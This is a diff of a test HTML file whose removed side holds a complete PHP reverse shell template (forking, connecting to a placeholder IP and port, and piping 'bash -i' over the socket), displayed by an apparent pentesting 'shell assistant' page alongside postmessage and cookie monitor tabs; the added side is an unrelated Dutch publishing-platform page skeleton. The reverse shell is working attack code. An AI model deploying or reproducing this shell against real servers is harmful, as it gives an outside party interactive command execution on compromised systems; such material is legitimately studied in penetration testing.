--- a/test.html
+++ b/test.html
@@ -1,237 +1,27 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Code Display</title>
-    <style>
-        code {
-            white-space: pre; /* This ensures that the white space (including newlines) is preserved. */
-        }
-    </style>
+    <meta charset="utf-8">
+    <title>src - Digitaal publicatie platform</title>
+    <meta name="viewport" content="width=device-width,initial-scale=1">
+    <meta name="mobile-web-app-capable" content="yes">
+    <meta name="apple-mobile-web-app-capable" content="yes">
+    <link rel="apple-touch-icon" href="/assets/icons/apple-touch-icon.png">
+    <link rel="stylesheet" href="https://rsms.me/inter/inter.css">
+    <link rel="stylesheet" href="/assets/tailwind.min.css">
+    <link href="//cdn.quilljs.com/1.3.6/quill.snow.css" rel="stylesheet">
+    <link rel="manifest" href="/manifest.json">
+    <meta name="theme-color" content="#673ab8">
+    <link rel="shortcut icon" href="/favicon.ico">
+    <style></style>
+    <link href="/bundle.a2aae.css" rel="stylesheet" media="only x" onload="this.media='all'">
+    <noscript>
+        <link rel="stylesheet" href="/bundle.a2aae.css">
+    </noscript>
 </head>
 <body>
-    <code id="shell-assistant-reverse-shell-code-element" class="w-75 rounded bg-light"></code>
-
-    <script>
-        const phpReverseShell = `<?php
-set_time_limit (0);
-$VERSION = "1.0";
-$ip = '{ip}';
-$port = {port};
-$chunk_size = 1400;
-$write_a = null;
-$error_a = null;
-$shell = 'uname -a; w; id; bash -i';
-$daemon = 0;
-$debug = 0;
-if (function_exists('pcntl_fork')) {
-    $pid = pcntl_fork();
-    if ($pid == -1) {
-        printit("ERROR: Can't fork");
-        exit(1);
-    }
-    if ($pid) {
-        exit(0);
-    }
-    if (posix_setsid() == -1) {
-        printit("Error: Can't setsid()");
-        exit(1);
-    }
-    $daemon = 1;
-} else {
-    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
-}
-chdir("/");
-umask(0);
-$sock = fsockopen($ip, $port, $errno, $errstr, 30);
-if (!$sock) {
-    printit("$errstr ($errno)");
-    exit(1);
-}
-$descriptorspec = array(
-    0 => array("pipe", "r"),
-    1 => array("pipe", "w"),
-    2 => array("pipe", "w")
-);
-$process = proc_open($shell, $descriptorspec, $pipes);
-if (!is_resource($process)) {
-    printit("ERROR: Can't spawn shell");
-    exit(1);
-}
-stream_set_blocking($pipes[0], 0);
-stream_set_blocking($pipes[1], 0);
-stream_set_blocking($pipes[2], 0);
-stream_set_blocking($sock, 0);
-printit("Successfully opened reverse shell to $ip:$port");
-while (1) {
-    if (feof($sock)) {
-        printit("ERROR: Shell connection terminated");
-        break;
-    }
-    if (feof($pipes[1])) {
-        printit("ERROR: Shell process terminated");
-        break;
-    }
-    $read_a = array($sock, $pipes[1], $pipes[2]);
-    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
-    if (in_array($sock, $read_a)) {
-        if ($debug) {
-            printit("SOCK READ");
-        }
-        $input = fread($sock, $chunk_size);
-        if ($debug) {
-            printit("SOCK: $input");
-        }
-        fwrite($pipes[0], $input);
-    }
-    if (in_array($pipes[1], $read_a)) {
-        if ($debug) {
-            printit("STDOUT READ");
-        }
-        $input = fread($pipes[1], $chunk_size);
-        if ($debug) {
-            printit("STDOUT: $input");
-        }
-        fwrite($sock, $input);
-    }
-    if (in_array($pipes[2], $read_a)) {
-        if ($debug) {
-            printit("STDERR READ");
-        }
-        $input = fread($pipes[2], $chunk_size);
-        if ($debug) {
-            printit("STDERR: $input");
-        }
-        fwrite($sock, $input);
-    }
-}
-fclose($sock);
-fclose($pipes[0]);
-fclose($pipes[1]);
-fclose($pipes[2]);
-proc_close($process);
-function printit ($string) {
-    if (!$daemon) {
-        print "$string\n";
-    }
-}
-?>`;
-
-        document.getElementById('shell-assistant-reverse-shell-code-element').textContent = phpReverseShell;
-    </script>
+<script crossorigin="anonymous" src="/bundle.023b3.esm.js" type="module"></script>
+<script nomodule="" src="/polyfills.4e1a3.js"></script>
+<script nomodule="" defer="defer" src="/bundle.afd31.js"></script>
 </body>
 </html>
-
-<div class="tab-pane fade" id="checklist-assistant-XXXXX-tab" role="tabpanel">
-
-    <!-- Tab switcher Message listener START -->
-    <ul class="nav nav-tabs" id="checklist-assistant-XXXXX-XXXXX-tab" role="tablist">
-
-        <li class="nav-item">
-            <a class="btn" id="checklist-assistant-WEB-nav-item"
-               data-bs-toggle="tab" href="#checklist-assistant-postmessage-monitor-tab" role="tab">
-                <div class="d-flex justify-content-between">
-                    <img data-bs-toggle="tooltip"
-                         data-bs-placement="right" title="Postmessage monitor"
-                         src="assets/icons/navbar/tab-2-enum-tooling/subtab-4-message-listener/postmessage-monitor.png"
-                         width="25px" height="25px">
-                    <div class="ms-1 text-dark" style="font-size: 10px;"
-                         id="checklist-assistant-postmessage-monitor-count">
-                        0
-                    </div>
-                </div>
-            </a>
-        </li>
-
-        <li class="nav-item">
-            <a class="btn" id="checklist-assistant-cookie-monitor-nav-item"
-               data-bs-toggle="tab" href="#checklist-assistant-cookie-monitor-tab" role="tab">
-                <div class="d-flex justify-content-between">
-                    <img data-bs-toggle="tooltip"
-                         data-bs-placement="right" title="Cookie monitor"
-                         src="assets/icons/navbar/tab-2-enum-tooling/subtab-4-message-listener/cookie-monitor.png"
-                         width="25px" height="25px">
-                    <div class="ms-1 text-dark" style="font-size: 10px;"
-                         id="checklist-assistant-cookie-monitor-count">
-                        0
-                    </div>
-                </div>
-            </a>
-        </li>
-
-    </ul>
-    <!-- Tab switcher Message listener END -->
-
-    <div class="tab-content">
-        <div class="tab-pane fade show active mt-1" id="checklist-assistant-postmessage-monitor-tab"
-             style="height: 420px" role="tabpanel">
-
-            <h6>
-                Postmessage monitor: <br>
-                <small>
-                    <span class="current-tab-url"></span>
-                </small>
-            </h6>
-
-            <div class="form-group d-flex justify-content-between">
-                <input class="form-control w-75 me-1" type="text" id="search-postmessage-input"
-                       placeholder="Search...">
-                <button class="refresh-control btn btn-outline-danger w-25"
-                        value="postmessage-monitor-table-table-body"
-                        data-control-refresh-active="true">Stop refresh
-                </button>
-            </div>
-
-            <div>
-                <table id="postmessage-monitor-table"
-                       class="table table-responsive-sm table-hover table-striped">
-                    <thead>
-                    <th>Message</th>
-                    <th>Timestamp</th>
-                    </thead>
-                    <tbody id="postmessage-monitor-table-table-body" data-control-update="true">
-
-                    </tbody>
-                </table>
-            </div>
-        </div>
-
-        <div class="tab-pane fade mt-1" id="checklist-assistant-cookie-monitor-tab"
-             style="height: 420px" role="tabpanel">
-
-            <h6>
-                Cookie monitor:
-                <br>
-                <small>
-                    <span class="current-tab-url"></span>
-                </small>
-            </h6>
-
-            <div class="form-group d-flex justify-content-between">
-                <input class="form-control w-75 me-1" type="text"
-                       id="search-cookie-monitor-input"
-                       placeholder="Search...">
-                <button class="refresh-control btn btn-outline-danger w-25"
-                        value="cookie-monitor-table-table-body"
-                        data-control-refresh-active="true">Stop refresh
-                </button>
-            </div>
-
-            <div>
-                <table id="cookie-monitor-table"
-                       class="table table-responsive-sm table-hover table-striped">
-                    <thead>
-                    <th>Action</th>
-                    <th>Cookie</th>
-                    <th>Path</th>
-                    <th>Timestamp</th>
-                    </thead>
-                    <tbody id="cookie-monitor-table-table-body" data-control-update="true">
-
-                    </tbody>
-                </table>
-            </div>
-        </div>
-    </div>
-</div>
